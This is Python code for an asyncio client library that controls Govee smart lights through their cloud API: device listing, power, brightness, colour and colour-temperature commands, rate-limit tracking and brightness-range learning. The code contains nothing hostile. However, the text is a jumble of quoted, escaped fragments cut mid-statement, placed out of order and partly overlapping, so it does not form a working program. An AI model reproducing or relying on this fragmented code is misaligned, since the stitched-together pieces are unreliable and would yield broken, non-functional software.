headers=self._getHeaders(auth), json=json ) )", "device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it", "as long as we run. # we will need to re-learn every time", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def", "timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result =", "if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong:", "item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False,", "method if you want to use this Client without an async context manager.\"\"\"", "self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str", "device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not", "result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color", "\"\"\"Delay a call when rate limiting is active.\"\"\" # do we have requests", "entry for device if learning_infos == None: learning_infos = {} if device.device not", "by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError):", "not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3:", "async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]:", "str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\":", "err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\"", "self._online != online: self._online = online # inform about state change self.events.online(self._online) if", "learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting", "device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text", "need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting", "= \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device:", ") result = await response.json() else: text = await response.text() err = f\"API-Error", "\"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise", "not None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: #", "Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and error", "[] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice:", "result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug(", "or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice):", "return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str,", "device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200:", "result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\"", "device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp =", "there is some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self,", "trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val}", "_API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL", "f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False", "The maximum number of requests you're permitted to make per minute. _RATELIMIT_REMAINING =", "cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if", "0 return success, err async def _learn(self, device): \"\"\"Persist learned information from device", "turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "= False prop_power_state = False prop_brightness = False prop_color = (0, 0, 0)", "= None device_str, device = self._get_device(device) if not device: err = f\"Invalid device", "def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device)", "and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]:", "_LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: #", "err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async", "Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the", ") -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success =", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp", "in self._devices: device = None # disallow unknown devices elif isinstance(device, str) and", "device: err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params =", "ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\")", "self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called", "_API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\"", "response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize", "async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device,", "as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result,", "learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off =", "device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if", "f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else:", "in UTC epoch seconds. # return state from hisory for n seconds after", "brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness *", "brightness < 0 or brightness > 254: err = f\"set_brightness: invalid value {brightness},", "prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off", "default, use config_offline_is_off from learning, or False by default. False: an offline device", "start = time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False)", "learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when your are", "self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the", "_RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate limit window", "%s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error =", "config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline. None: default,", "'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just", "0-254.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "an internal learning storage as long as we run. # we will need", "self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, )", "from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\":", "str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success", "not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True #", "from cache: {result}, next state for {device.device} from api allowed in {seconds_locked} seconds\"", "manager response yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False)", "\"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object:", "able to connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set", "> self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" )", "bool): \"\"\"Set the online state and fire an event on change.\"\"\" if self._online", "= self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: command", "= await response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color", "online self._track_rate_limit(response) # return the async content manager response yield response except aiohttp.ClientError", "got something, so we are online self._track_rate_limit(response) # return the async content manager", "match the actual brightness pull the brightness up to max once.\", device.device, )", "limiting is active.\"\"\" # do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on:", "async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]:", "\"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int", "is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async", "Cmd Value # set brightness as 0..100 as 0..254 didn't work brightness_set =", "govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__)", "learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False #", "_API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" #", "# show all devices as offline for device in self.devices: device.online = False", "learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO", "color (r, g, b) where each value may be in range 0-255 \"\"\"", "= f\"set_color: invalid value {color}, blue must be within 0 .. 254\" else:", "to connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the", "left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec =", "err_msg): self._err_msg = err_msg status = -1 async def text(self): return self._err_msg yield", "bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online await self.ping()", "val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter", "= None # disallow unknown devices elif isinstance(device, str) and device_str in self._devices:", "lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool #", "online: self._online = online # inform about state change self.events.online(self._online) if not online:", "aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown error: %s\"", "self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\"", "GoveeDevice): device_str = device.device if not device_str in self._devices: device = None #", "> 255: err = ( f\"set_color: invalid value {color}, red must be within", "str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth),", "response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit =", "= brightness_result_100 command = \"brightness\" result, err = await self._control(device, command, brightness_set) if", "f\"set_color: invalid value {color}, red must be within 0 .. 254\" ) elif", "pull the brightness up to max once.\", device.device, ) changed = True learning_infos[", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness =", "self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device", "device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\"", "prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't", "get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay", "an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True", "self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe available call", "device {device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid value", "= 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use", "red < 0 or red > 255: err = ( f\"set_color: invalid value", "err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" +", "except aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error from", "{device}\" else: command = \"turn\" params = onOff result, err = await self._control(device,", "self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if", "device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not", "self._online = online # inform about state change self.events.online(self._online) if not online: #", "for one specific device.\"\"\" device_str, device = self._get_device(device) result = None err =", "Dict and entry for device if learning_infos == None: learning_infos = {} if", "device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return", "def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds", "].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug(", "\"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API", "be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will", "command in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control", "item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp,", "200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state =", "= f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else: if brightness", "led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\":", "strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params}", "is assumed. If the brightness slider doesn't match the actual brightness pull the", "online(self): \"\"\"Last request was able to connect to the API.\"\"\" return self._online def", "@classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ):", "available call count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset", "prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"]", "def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address", "lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is", "set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]:", "if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not", "resets in UTC epoch seconds. # return state from hisory for n seconds", "{cmd}\") result = None err = None if not device: err = f\"Invalid", "prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0 for prop", "= await response.json() else: text = await response.text() err = f\"API-Error {response.status} on", "= \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next", "# we are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex)", "device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max", "rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests", "safe available call count for multiple processes self._limit = 100 self._limit_remaining = 100", ".. 254\" elif blue < 0 or blue > 255: err = f\"set_color:", "# do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0:", "= False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: #", "create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\"", "self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time() - start)", "False: an offline device doesn't change power state. True: an offline device is", "!= device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness", "as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None):", "- self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to", "prop_online = False prop_power_state = False prop_brightness = False prop_color = (0, 0,", "long as we run. # we will need to re-learn every time again.", "value {color}, must be tuple with (r, g, b) values\" else: red =", "0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all", "int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds}", "= f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not", "also handles: - rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay()", "trigger rate limiting. Defaults to 5, which means there is some room for", "async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async", "allowed range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command,", "API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if err:", "auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put(", "device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max ==", "uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max ==", "possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\"", "dicts with one element if \"online\" in prop: prop_online = prop[\"online\"] is True", "which the current rate limit window resets in UTC epoch seconds. # return", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp", "async content manager response yield response except aiohttp.ClientError as ex: # we are", "!= 3: err = f\"set_color: invalid value {color}, must be tuple with (r,", "is active.\"\"\" # do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: #", "seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee", "rate limiting. Defaults to 5, which means there is some room for other", "prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None", "f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command", "-> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property", "return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices", "value may be in range 0-255 \"\"\" success = False err = None", "config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\"", "prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"],", "if you want to use this Client without an async context manager.\"\"\" self", "\"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a", "a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device", "val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for", "self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str,", ".. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api", "package.\"\"\" import asyncio import logging import time import math from contextlib import asynccontextmanager", "response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check", "= math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set brightness", "async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do", "def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val", "other devices also utilize the govee API\" ) limit_unknown = True if (", "self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json() timestamp =", "before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly overridden by", "= 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "v%s\", VERSION) self._online = True # assume we are online self.events = Events()", "err = await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max =", "_LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown =", "from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER =", "learning, or False by default. False: an offline device doesn't change power state.", "and entry for device if learning_infos == None: learning_infos = {} if device.device", "device.\"\"\" device_str, device = self._get_device(device) result = None err = None seconds_locked =", "self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color", "= self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness", "{device.device} from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device,", "self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None", "API: {json_obj}, resulting state object: {result}\" ) else: errText = await response.text() err", "await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await", "or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = (", "manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if", "> 254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\"", "internal learning storage as long as we run. # we will need to", "offline device is shown as off. \"\"\" self._config_offline_is_off = val @property def devices(self)", "\"\"\"Set color temperature to 2000-9000.\"\"\" success = False err = None device_str, device", "= int((time.time() - start) * 1000) if response.status == 200: if \"Pong\" ==", "False prop_color = (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]:", "= self._devices[device_str] elif seconds_locked: # we just changed something, return state from history", "events import Events from typing import Any, List, Optional, Tuple, Union import aiohttp", "seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command:", "device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result", "must be within 0 .. 254\" ) elif green < 0 or green", "if not online: # show all devices as offline for device in self.devices:", "self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def", "assumption, as we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max", "learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max", "\"colorTem\" result, err = await self._control(device, command, color_temp) if not err: success =", "= None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" )", "response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING])", "learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or", "async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color =", "repr(ex) except Exception as ex: err = \"unknown error: %s\" % repr(ex) if", "= f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not", "err = await self._control(device, command, brightness_set) if err: # try again with 0-100", "\"\"\"Check connection to API.\"\"\" try: # this will set self.online await self.ping() except:", "cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err", "= self._get_device(device) return device @property def online(self): \"\"\"Last request was able to connect", "@property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be", ") if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above", "brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set ) if", "@asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\"", "{device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid value {color},", "Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session =", "temperature to 2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device)", "lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err =", "== 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow()", "= None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive", "await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as", "set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color", "GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object):", "seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params)", "= False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None,", "must be within 0 .. 254\" elif blue < 0 or blue >", "Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage", "response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos = await", "GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val @property def", "try: # this will set self.online await self.ping() except: pass return self.online async", "return success, err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\"", "If the brightness slider doesn't match the actual brightness pull the brightness up", "are online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on =", "brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self, device):", "int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if", "timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj},", "-> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err =", "information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed", "VERSION) self._online = True # assume we are online self.events = Events() self._api_key", "until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def", "blue < 0 or blue > 255: err = f\"set_color: invalid value {color},", "= f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or brightness >", "prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state", "device if learning_infos == None: learning_infos = {} if device.device not in learning_infos:", "success = False err = None device_str, device = self._get_device(device) if not device:", "a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str =", "limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting", "\"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay", "{val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the", "= 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with", "option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or (", "@property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev", "err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices", ".. 254\" ) elif green < 0 or green > 255: err =", "False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if", "-> Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may be", "2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range", "def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property", "await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable", "= await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100", "run. # we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage()", "if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False", "do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need", "with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time() -", "self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist", "result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from", "device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything higher )", "device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if", "limiter threshold {val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self):", "the brightness slider doesn't match the actual brightness pull the brightness up to", "\"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context", "int, int] color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until:", "= prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" 